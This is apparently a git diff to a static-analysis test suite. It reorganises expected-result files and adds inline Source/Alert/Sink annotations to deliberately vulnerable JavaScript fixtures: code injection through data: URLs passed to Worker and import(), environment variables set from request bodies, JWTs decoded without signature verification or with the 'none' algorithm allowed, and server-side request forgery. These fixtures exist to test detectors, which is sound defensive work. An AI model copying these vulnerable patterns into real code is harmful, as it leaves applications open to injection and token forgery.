| req.que ... rameter | user-provided value | +| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | +| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | edges | test.js:5:11:5:17 | payload | test.js:6:30:6:36 | payload | provenance | | | test.js:5:11:5:17 | payload | test.js:9:26:9:32 | payload | provenance | | @@ -33,8 +38,3 @@ nodes | test.js:19:18:19:24 | payload | semmle.label | payload | | test.js:19:18:19:30 | payload + sth | semmle.label | payload + sth | subpaths -#select -| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | -| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref index 3caf7ab7b43b..9ed18359d203 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-094-dataURL/CodeInjection.ql \ No newline at end of file +query: experimental/Security/CWE-094-dataURL/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js b/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js index a5a2e76fa3c8..0c1a654d7021 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/test.js @@ -2,21 +2,21 @@ const { Worker } = require('node:worker_threads'); var app = require('express')(); app.post('/path', async function (req, res) { - const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' + const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' // $ Source let payloadURL = new URL(payload + sth) // NOT OK - new Worker(payloadURL); + new Worker(payloadURL); // $ Alert payloadURL = new URL(payload + sth) // NOT OK - new Worker(payloadURL); + new Worker(payloadURL); // $ Alert payloadURL = new URL(sth + payload) // OK new Worker(payloadURL); }); app.post('/path2', async function (req, res) { - const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' - await import(payload) // NOT OK - await import(payload + sth) // NOT OK + const payload = req.query.queryParameter // like: payload = 'data:text/javascript,console.log("hello!");//' // $ Source + await import(payload) // NOT OK // $ Alert + await import(payload + sth) // NOT OK // $ Alert await import(sth + payload) // OK }); diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected index d54685c97bef..bbf737831d6d 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected @@ -1,3 +1,6 @@ +#select +| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | +| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | edges | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:11:5:18 | EnvValue | provenance | | | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:21:5:26 | EnvKey | provenance | | @@ -27,6 +30,3 @@ nodes | test.js:15:15:15:20 | EnvKey | semmle.label | EnvKey | | test.js:16:26:16:33 | EnvValue | semmle.label | EnvValue | subpaths -#select -| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | -| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref index fde9a286e5a8..dbd1332e35ae 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-099/EnvValueAndKeyInjection.ql \ No newline at end of file +query: experimental/Security/CWE-099/EnvValueAndKeyInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js index a12377c9cec9..f531447f4364 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/test.js @@ -2,9 +2,9 @@ const http = require('node:http'); http.createServer((req, res) => { - const { EnvValue, EnvKey } = req.body; - process.env[EnvKey] = EnvValue; // NOT OK - process.env[EnvKey] = EnvValue; // NOT OK + const { EnvValue, EnvKey } = req.body; // $ Source + process.env[EnvKey] = EnvValue; // NOT OK // $ Alert + process.env[EnvKey] = EnvValue; // NOT OK // $ Alert res.end('env has been injected!'); }); diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected index 5ba1884017f6..ae8779ded9e7 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected @@ -1,3 +1,7 @@ +#select +| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | edges | test.js:4:9:4:20 | { EnvValue } | test.js:4:11:4:18 | EnvValue | provenance | | | test.js:4:11:4:18 | EnvValue | test.js:5:35:5:42 | EnvValue | provenance | | @@ -12,7 +16,3 @@ nodes | test.js:6:23:6:30 | EnvValue | semmle.label | EnvValue | | test.js:7:22:7:29 | EnvValue | semmle.label | EnvValue | subpaths -#select -| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref index e03328beda4f..9fc1b79b8107 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-099/EnvValueInjection.ql \ No newline at end of file +query: experimental/Security/CWE-099/EnvValueInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js index cb28f01b88b0..24eee6278b80 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/test.js @@ -1,10 +1,10 @@ const http = require('node:http'); http.createServer((req, res) => { - const { EnvValue } = req.body; - process.env["A_Critical_Env"] = EnvValue; // NOT OK - process.env[AKey] = EnvValue; // NOT OK - process.env.AKey = EnvValue; // NOT OK + const { EnvValue } = req.body; // $ Source + process.env["A_Critical_Env"] = EnvValue; // NOT OK // $ Alert + process.env[AKey] = EnvValue; // NOT OK // $ Alert + process.env.AKey = EnvValue; // NOT OK // $ Alert res.end('env has been injected!'); }); diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js index 022b0bda11f4..a10382235c07 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/JsonWebToken.js @@ -10,18 +10,18 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink })(); (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK - jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink + jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK // $ Sink })(); (function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected index 09db119d0786..ba75c463f9be 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected @@ -1,3 +1,10 @@ +#select +| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | +| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | +| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | +| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | edges | JsonWebToken.js:13:11:13:19 | UserToken | JsonWebToken.js:16:28:16:36 | UserToken | provenance | | | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:11:13:19 | UserToken | provenance | | @@ -73,10 +80,3 @@ nodes | jwtSimple.js:31:23:31:31 | UserToken | semmle.label | UserToken | | jwtSimple.js:32:23:32:31 | UserToken | semmle.label | UserToken | subpaths -#select -| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | -| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | -| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | -| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref index ee8effa049c5..36743e927596 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-347/decodeJwtWithoutVerificationLocalSource.ql \ No newline at end of file +query: experimental/Security/CWE-347/decodeJwtWithoutVerificationLocalSource.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js index 625618e194dc..4831b56d0ff2 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jose.js @@ -9,10 +9,10 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // no signature verification - jose.decodeJwt(UserToken) // NOT OK + jose.decodeJwt(UserToken) // NOT OK // $ Sink })(); (async function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js index f3d4a40314c7..45ac500770a4 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtDecode.js @@ -10,9 +10,9 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // jwt-decode // no signature verification - jwt_decode(UserToken) // NOT OK + jwt_decode(UserToken) // NOT OK // $ Sink })(); \ No newline at end of file diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js index 73b79d86d758..894a23aca788 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/jwtSimple.js @@ -10,10 +10,10 @@ function aJWT() { } (function () { - const UserToken = aJwt() + const UserToken = aJwt() // $ Alert // BAD: no signature verification - jwt_simple.decode(UserToken, getSecret(), true); // NOT OK + jwt_simple.decode(UserToken, getSecret(), true); // NOT OK // $ Sink })(); (function () { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js index 0e39e95b632d..a562e4add805 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/JsonWebToken.js @@ -7,18 +7,18 @@ function getSecret() { return "A Safe generated random key" } app.get('/jwtJsonwebtoken1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink }) app.get('/jwtJsonwebtoken2', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // BAD: no signature verification - jwtJsonwebtoken.decode(UserToken) // NOT OK - jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK + jwtJsonwebtoken.decode(UserToken) // NOT OK // $ Sink + jwtJsonwebtoken.verify(UserToken, getSecret(), { algorithms: ["HS256", "none"] }) // NOT OK // $ Sink }) app.get('/jwtJsonwebtoken3', (req, res) => { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected index 364fbd76b002..54fa92b1b136 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected @@ -1,3 +1,10 @@ +#select +| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | +| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | +| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | +| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | edges | JsonWebToken.js:10:11:10:19 | UserToken | JsonWebToken.js:13:28:13:36 | UserToken | provenance | | | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:11:10:19 | UserToken | provenance | | @@ -48,10 +55,3 @@ nodes | jwtSimple.js:25:23:25:47 | req.hea ... ization | semmle.label | req.hea ... ization | | jwtSimple.js:28:23:28:31 | UserToken | semmle.label | UserToken | subpaths -#select -| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | -| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | -| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | -| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref index 9e7ea468ee79..d37a36dbcca3 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-347/decodeJwtWithoutVerification.ql \ No newline at end of file +query: experimental/Security/CWE-347/decodeJwtWithoutVerification.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js index 30c57650e336..c2c36e88be80 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jose.js @@ -8,9 +8,9 @@ function getSecret() { } app.get('/jose1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // no signature verification - jose.decodeJwt(UserToken) // NOT OK + jose.decodeJwt(UserToken) // NOT OK // $ Sink }) diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js index 76a26e0df366..cb57c74a46ff 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtDecode.js @@ -8,11 +8,11 @@ function getSecret() { } app.get('/jwtDecode', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // jwt-decode // no signature verification - jwt_decode(UserToken) // NOT OK + jwt_decode(UserToken) // NOT OK // $ Sink }) app.listen(port, () => { diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js index 4803309e3e55..9a015aa807d2 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/jwtSimple.js @@ -7,10 +7,10 @@ function getSecret() { return "A Safe generated random key" } app.get('/jwtSimple1', (req, res) => { - const UserToken = req.headers.authorization; + const UserToken = req.headers.authorization; // $ Alert // no signature verification - jwt_simple.decode(UserToken, getSecret(), true); // NOT OK + jwt_simple.decode(UserToken, getSecret(), true); // NOT OK // $ Sink }) app.get('/jwtSimple2', (req, res) => { diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected index 8a0dabd4c59e..0c79678c683f 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected @@ -1,3 +1,24 @@ +#select +| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | +| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | +| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | +| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | +| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | +| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | edges | check-domain.js:16:9:16:11 | url | check-domain.js:17:13:17:15 | url | provenance | | | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:16:9:16:11 | url | provenance | | @@ -65,24 +86,3 @@ nodes | check-validator.js:68:15:68:45 | "test.c ... tainted | semmle.label | "test.c ... tainted | | check-validator.js:68:29:68:45 | req.query.tainted | semmle.label | req.query.tainted | subpaths -#select -| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | -| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | -| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request 